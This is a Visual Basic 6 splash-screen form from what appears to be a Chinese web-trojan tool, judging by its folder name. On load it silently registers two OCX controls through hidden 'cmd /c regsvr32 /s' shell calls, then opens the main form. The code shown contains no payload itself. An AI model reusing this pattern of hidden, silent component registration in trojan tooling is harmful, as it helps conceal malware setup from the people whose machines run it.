📄 kaishi.frm
字号:
VERSION 5.00
Begin VB.Form kaishi
BorderStyle = 0 'None
Caption = "Form4"
ClientHeight = 2535
ClientLeft = 0
ClientTop = 0
ClientWidth = 5115
Icon = "kaishi.frx":0000
LinkTopic = "Form4"
Picture = "kaishi.frx":4B2A
ScaleHeight = 2535
ScaleWidth = 5115
ShowInTaskbar = 0 'False
StartUpPosition = 2 '屏幕中心
Begin VB.Timer Timer1
Interval = 2500
Left = 240
Top = 1440
End
End
Attribute VB_Name = "kaishi"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Form_Load()
Shell "cmd /c" + "regsvr32 /s c:\神之网马\data\COMDLG32.OCX", 0
Shell "cmd /c" + "regsvr32 /s c:\神之网马\data\MMBT_OSXE.ocx", 0
End Sub
Private Sub Timer1_Timer()
Unload Me
Form1.Show
End Sub
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -